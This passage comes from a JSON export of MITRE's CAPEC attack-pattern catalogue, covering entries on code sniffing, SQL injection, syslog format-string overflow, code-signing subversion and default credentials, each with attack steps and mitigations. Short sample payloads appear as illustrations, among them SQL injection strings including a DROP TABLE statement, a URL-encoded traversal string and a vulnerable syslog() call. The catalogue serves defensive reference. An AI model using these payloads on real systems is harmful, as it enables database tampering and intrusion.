server."},{"Step":"4","Phase":"Exploit","Description":"The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences."}]},"Prerequisites":{"Prerequisite":["The application accepts and decodes URL string request.","The application performs insufficient filtering/canonicalization on the URLs."]},"Skills_Required":{"Skill":["An attacker can try special characters in the URL and bypass the URL validation.",{"Level":"Low"},"The attacker may write a script to defeat the input filtering mechanism.",{"Level":"Medium"}]},"Indicators":{"Indicator":["If the first decoding process has left some invalid or denylisted characters, that may be a sign that the request is malicious.","Traffic filtering with IDS (or proxy) can detect requests with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks."]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.","Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.","When client input is required from web-based forms, avoid using the \\"GET\\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \\"POST method whenever possible.","Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.","Refer to the RFCs to safely decode URL.","Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.","There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)."]},"Example_Instances":{"Example":{"p":["Attack Example: Combined Encodings CesarFTP","Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.","An attacker could provide a URL that included a string like","This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot."],"div":["/...%5C/",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"177"},{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"73"},{"CWE_ID":"22"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-495"},{"External_Reference_ID":"REF-496"},{"External_Reference_ID":"REF-497"},{"External_Reference_ID":"REF-498","Section":"URL Encoding Reference"},{"External_Reference_ID":"REF-499"},{"External_Reference_ID":"REF-500","Section":"5.11.4. Validating Hypertext Links (URIs/URLs)"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Obfuscation_Techniques, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Indicators, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"65":{"ID":"65","Name":"Sniff Application Code","Abstraction":"Detailed","Status":"Draft","Description":"An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"157"},{"Nature":"CanPrecede","CAPEC_ID":"37"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Set up a sniffer] The adversary sets up a sniffer in the path between the server and the client and watches the traffic.","Technique":"The adversary sets up a sniffer in the path between the server and the client."},{"Step":"2","Phase":"Exploit","Description":"[Capturing Application Code Bound During Patching]adversary knows that the computer/OS/application can request new applications to install, or it periodically checks for an available update. The adversary loads the sniffer set up during Explore phase, and extracts the application code from subsequent communication. The adversary then proceeds to reverse engineer the captured code.","Technique":["adversary loads the sniffer to capture the application code bound during a dynamic update.","The adversary proceeds to reverse engineer the captured code."]}]},"Prerequisites":{"Prerequisite":["The attacker must have the ability to place themself in the communication path between the client and server.","The targeted application must receive some application code from the server; for example, dynamic updates, patches, applets or scripts.","The attacker must be able to employ a sniffer on the network without being detected."]},"Skills_Required":{"Skill":["The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. Also if the attacker plans to employ an adversary-in-the-middle attack (CAPEC-94), the client or server must not realize this. Finally, the attacker needs to regenerate source code from binary code if the need be.",{"Level":"Medium"}]},"Resources_Required":{"Resource":{"p":["The Attacker needs the ability to capture communications between the client being updated and the server providing the update.","In the case that encryption obscures client/server communication the attacker will either need to lift key material from the client."]}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Encrypt all communication between the client and server.","Implementation: Use SSL, SSH, SCP.","Operation: Use \\"ifconfig/ipconfig\\" or other tools to detect the sniffer installed in the network."]},"Example_Instances":{"Example":["Attacker receives notification that the computer/OS/application has an available update, loads a network sniffing tool, and extracts update data from subsequent communication. The attacker then proceeds to reverse engineer the captured stream to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc..","Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"319"},{"CWE_ID":"311"},{"CWE_ID":"318"},{"CWE_ID":"693"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Passively Sniff and Capture Application Code Bound for Authorized Client",{"Date":"2015-12-07"}]}},"66":{"ID":"66","Name":"SQL Injection","Abstraction":"Standard","Status":"Draft","Description":"This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input. When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers\' choice. SQL Injection enables an attacker to interact directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey application] The attacker first takes an inventory of the functionality exposed by the application.","Technique":["Spider web sites for all available links","Sniff network communications with application using a utility such as WireShark."]},{"Step":"2","Phase":"Experiment","Description":"[Determine user-controllable input susceptible to injection] Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to SQL injection, attempt to inject characters that have special meaning in SQL (such as a single quote character, a double quote character, two hyphens, a parenthesis, etc.). The goal is to create a SQL query with an invalid syntax.","Technique":["Use web browser to inject input through text fields or through HTTP GET parameters.","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.","Use network-level packet injection tools such as netcat to inject input","Use modified client (modified by reverse engineering) to inject input."]},{"Step":"3","Phase":"Experiment","Description":"[Experiment with SQL Injection vulnerabilities] After determining that a given input is vulnerable to SQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, or to modify or delete information in the database.","Technique":["Use public resources such as \\"SQL Injection Cheat Sheet\\" at http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/, and try different approaches for adding logic to SQL queries.","Add logic to query, and use detailed error messages from the server to debug the query. For example, if adding a single quote to a query causes an error message, try : \\"\' OR 1=1; --\\", or something else that would syntactically complete a hypothesized query. Iteratively refine the query.","Use \\"Blind SQL Injection\\" techniques to extract information about the database schema.","If a denial of service attack is the goal, try stacking queries. This does not work on all platforms (most notably, it does not work on Oracle or MySQL). Examples of inputs to try include: \\"\'; DROP TABLE SYSOBJECTS; --\\" and \\"\'); DROP TABLE SYSOBJECTS; --\\". These particular queries will likely not work because the SYSOBJECTS table is generally protected."]},{"Step":"4","Phase":"Exploit","Description":"[Exploit SQL Injection vulnerability] After refining and adding various logic to SQL queries, craft and execute the underlying SQL query that will be used to attack the target system. The goal is to reveal, modify, and/or delete database data, using the knowledge obtained in the previous step. This could entail crafting and executing multiple SQL queries if a denial of service attack is the intent.","Technique":"Craft and Execute underlying SQL query"}]},"Prerequisites":{"Prerequisite":["SQL queries used by the application to store, retrieve or modify data.","User-controllable input that is not properly validated by the application as part of SQL queries."]},"Skills_Required":{"Skill":["It is fairly simple for someone with basic SQL knowledge to perform SQL injection, in general. In certain instances, however, specific knowledge of the database employed may be required.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":"Too many false or invalid queries to the database, especially those caused by malformed input."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(\') or SQL-comments (--) based on the context in which they appear.","Use of parameterized queries or stored procedures - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. Note that SQL Injection is possible even in the presence of stored procedures if the eventual query is constructed dynamically.","Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application."]},"Example_Instances":{"Example":"With PHP-Nuke versions 7.9 and earlier, an attacker can successfully access and modify data, including sensitive contents such as usernames and password hashes, and compromise the application through SQL Injection. The protection mechanism against SQL Injection employs a denylist approach to input validation. However, because of an improper denylist, it is possible to inject content such as \\"foo\'/**/UNION\\" or \\"foo UNION/**/\\" to bypass validation and glean sensitive information from the database. See also: CVE-2006-5525"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"89"},{"CWE_ID":"1286"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"19","Entry_Name":"SQL Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"SQL Injection"}]},"References":{"Reference":{"External_Reference_ID":"REF-607","Section":"Testing for SQL Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}]}},"67":{"ID":"67","Name":"String Format Overflow in syslog()","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets applications and software that uses the syslog() function insecurely. If an application does not explicitely use a format string parameter in a call to syslog(), user input can be placed in the format string parameter leading to a format string injection attack. Adversaries can then inject malicious format string commands into the function call leading to a buffer overflow. There are many reported software vulnerabilities with the root cause being a misuse of the syslog() function.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"100"},{"Nature":"ChildOf","CAPEC_ID":"135"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. In this attack, adversaries look for applications that use syslog() incorrectly."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.","Technique":"Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries\' choosing which points to code injected by the adversary.","Technique":["The formatting characters %s and %d are useful for observing memory and trying to print memory addresses. If an adversary has access to the log being written to they can observer this output and use it to help craft their attack.","The formatting character %n is useful for adding extra data onto the buffer."]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary supplies the program with the crafted format string injection, causing a buffer."}]},"Prerequisites":{"Prerequisite":"The Syslog function is used without specifying a format string argument, allowing user input to be placed direct into the function call as a format string."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":{"p":["The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():","The following code shows a vulnerable usage of Syslog():"],"div":["syslog(LOG_ERR, \\"%s\\", cmdBuf);",{"style":"margin-left:10px;","class":"good"},"syslog(LOG_ERR, cmdBuf);",{"style":"margin-left:10px;","class":"bad","div":{"i":"// the buffer cmdBuff is taking user supplied data."}}]}},"Example_Instances":{"Example":"Format string vulnerability in TraceEvent function for ntop before 2.1 allows remote attackers to execute arbitrary code by causing format strings to be injected into calls to the syslog function, via (1) an HTTP GET request, (2) a user name in HTTP authentication, or (3) a password in HTTP authentication. See also: CVE-2002-0412"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"134"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"697"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"06","Entry_Name":"Format String"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-503"},{"External_Reference_ID":"REF-504"},{"External_Reference_ID":"REF-505"},{"External_Reference_ID":"REF-506"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Prerequisites, Related_Attack_Patterns"}]}},"68":{"ID":"68","Name":"Subvert Code-signing Facilities","Abstraction":"Standard","Status":"Draft","Description":"Many languages use code signing facilities to vouch for code\'s identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"233"}},"Prerequisites":{"Prerequisite":["A framework-based language that supports code signing (such as, and most commonly, Java or .NET)","Deployed code that has been signed by its authoring vendor, or a partner.","The attacker will, for most circumstances, also need to be able to place code in the victim container. This does not necessarily mean that they will have to subvert host-level security, except when explicitly indicated."]},"Skills_Required":{"Skill":["Subverting code signing is not a trivial activity. Most code signing and verification schemes are based on use of cryptography and the attacker needs to have an understanding of these cryptographic operations in good detail. Additionally the attacker also needs to be aware of the way memory is assigned and accessed by the container since, often, the only way to subvert code signing would be to patch the code in memory. Finally, a knowledge of the platform specific mechanisms of signing and verifying code is a must.",{"Level":"High"}]},"Resources_Required":{"Resource":"The Attacker needs no special resources beyond the listed prerequisites in order to conduct this style of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["A given code signing scheme may be fallible due to improper use of cryptography. Developers must never roll out their own cryptography, nor should existing primitives be modified or ignored.","If an attacker cannot attack the scheme directly, they might try to alter the environment that affects the signing and verification processes. A possible mitigation is to avoid reliance on flags or environment variables that are user-controllable."]},"Example_Instances":{"Example":["In old versions (prior to 3.0b4) of the Netscape web browser Attackers able to foist a malicious Applet into a client\'s browser could execute the \\"Magic Coat\\" attack. In this attack, the offending Applet would implement its own getSigners() method. This implementation would use the containing VM\'s APIs to acquire other Applet\'s signatures (by calling _their_ getSigners() method) and if any running Applet had privileged-enough signature, the malicious Applet would have inherited that privilege just be (metaphorically) donning the others\' coats.","Some (older) web browsers allowed scripting languages, such as JavaScript, to call signed Java code. In these circumstances, the browser\'s VM implementation would choose not to conduct stack inspection across language boundaries (from called signed Java to calling JavaScript) and would short-circuit \\"true\\" at the language boundary. Doing so meant that the VM would allow any (unprivileged) script to call privileged functions within signed code with impunity, causing them to fall prey to luring attacks.","The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"325"},{"CWE_ID":"328"},{"CWE_ID":"1326"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}]}},"69":{"ID":"69","Name":"Target Programs with Elevated Privileges","Abstraction":"Standard","Status":"Draft","Description":"This attack targets programs running with elevated privileges. The adversary tries to leverage a vulnerability in the running program and get arbitrary code to execute with elevated privileges.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"233","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"8"},{"Nature":"CanPrecede","CAPEC_ID":"9"},{"Nature":"CanPrecede","CAPEC_ID":"10"},{"Nature":"CanPrecede","CAPEC_ID":"67"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find programs with elevated priveleges] The adversary probes for programs running with elevated privileges.","Technique":"Look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break."},{"Step":"2","Phase":"Explore","Description":"[Find vulnerability in running program] The adversary looks for a vulnerability in the running program that would allow for arbitrary code execution with the privilege of the running program.","Technique":["Look for improper input validation","Look for improper failure safety. For instance when a program fails it may authorize restricted access to anyone.","Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data."]},{"Step":"3","Phase":"Exploit","Description":"[Execute arbitrary code] The adversary exploits the vulnerability that they have found. For instance, they can try to inject and execute arbitrary code or write to OS resources."}]},"Prerequisites":{"Prerequisite":["The targeted program runs with elevated OS privileges.","The targeted program accepts input data from the user or from another program.","The targeted program is giving away information about itself. Before performing such attack, an eventual attacker may need to gather information about the services running on the host target. The more the host target is verbose about the services that are running (version number of application, etc.) the more information can be gather by an attacker.","This attack often requires communicating with the host target services directly. For instance Telnet may be enough to communicate with the host target."]},"Skills_Required":{"Skill":["An attacker can use a tool to scan and automatically launch an attack against known issues. A tool can also repeat a sequence of instructions and try to brute force the service on the host target, an example of that would be the flooding technique.",{"Level":"Low"},"More advanced attack may require knowledge of the protocol spoken by the host service.",{"Level":"Medium"}]},"Indicators":{"Indicator":"The log can have a trace of abnormal activity. Also if abnormal activity is detected on the host target. For instance flooding should be seen as abnormal activity and the target host may decide to take appropriate action in order to mitigate the attack (data filtering or blocking). Resource exhaustion is also a sign of abnormal activity."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"}]},"Mitigations":{"Mitigation":["Apply the principle of least privilege.","Validate all untrusted data.","Apply the latest patches.","Scan your services and disable the ones which are not needed and are exposed unnecessarily. Exposing programs increases the attack surface. Only expose the services which are needed and have security mechanisms such as authentication built around them.","Avoid revealing information about your system (e.g., version of the program) to anonymous users.","Make sure that your program or service fail safely. What happen if the communication protocol is interrupted suddenly? What happen if a parameter is missing? Does your system have resistance and resilience to attack? Fail safely when a resource exhaustion occurs.","If possible use a sandbox model which limits the actions that programs can take. A sandbox restricts a program to a set of privileges and commands that make it difficult or impossible for the program to cause any damage.","Check your program for buffer overflow and format String vulnerabilities which can lead to execution of malicious code.","Monitor traffic and resource usage and pay attention if resource exhaustion occurs.","Protect your log file from unauthorized modification and log forging."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"250"},{"CWE_ID":"15"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Prerequisites"}]}},"70":{"ID":"70","Name":"Try Common or Default Usernames and Passwords","Abstraction":"Detailed","Status":"Draft","Description":"An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. \\"secret\\" or \\"password\\") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"49"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Prerequisites":{"Prerequisite":"The system uses one factor password based authentication.The adversary has the means to interact with the system."},"Skills_Required":{"Skill":["An adversary just needs to gain access to common default usernames/passwords specific to the technologies used by the system. Additionally, a brute force attack leveraging common passwords can be easily realized if the user name is known.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Technology or vendor specific list of default usernames and passwords."},"Indicators":{"Indicator":"Many incorrect login attempts are detected by the system."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Delete all default account credentials that may be put in by the product vendor.","Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.","Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users.","Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen."]},"Example_Instances":{"Example":["A user sets their password to \\"123\\" or intentionally leaves their password blank. If the system does not have password strength enforcement against a sound password policy, this password may be admitted. Passwords like these two examples are two simple and common passwords that are easily able to be guessed by the adversary.","Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username \\"root\\" with a password \\"password\\". This allows remote attackers to easily obtain administrative privileges. See also: CVE-2006-5288","In April 2019, adversaries attacked several popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. An investigation conducted by the Microsoft Security Resposne Center (MSRC) discovered that these devices were used to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer\u2019s passwords and in the third instance the latest security update had not been applied to the device. [REF-572]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"521"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"798"},{"CWE_ID":"654"},{"CWE_ID":"308"},{"CWE_ID":"309"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1078.001","Entry_Name":"Valid Accounts:Default Accounts"}},"References":{"Reference":[{"External_Reference_ID":"REF-572"},{"External_Reference_ID":"REF-574"},{"External_Reference_ID":"REF-596","Section":"Testing for Account Enumeration and Guessable User Account"},{"External_Reference_ID":"REF-597","Section":"Testing for Default Credentials"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated 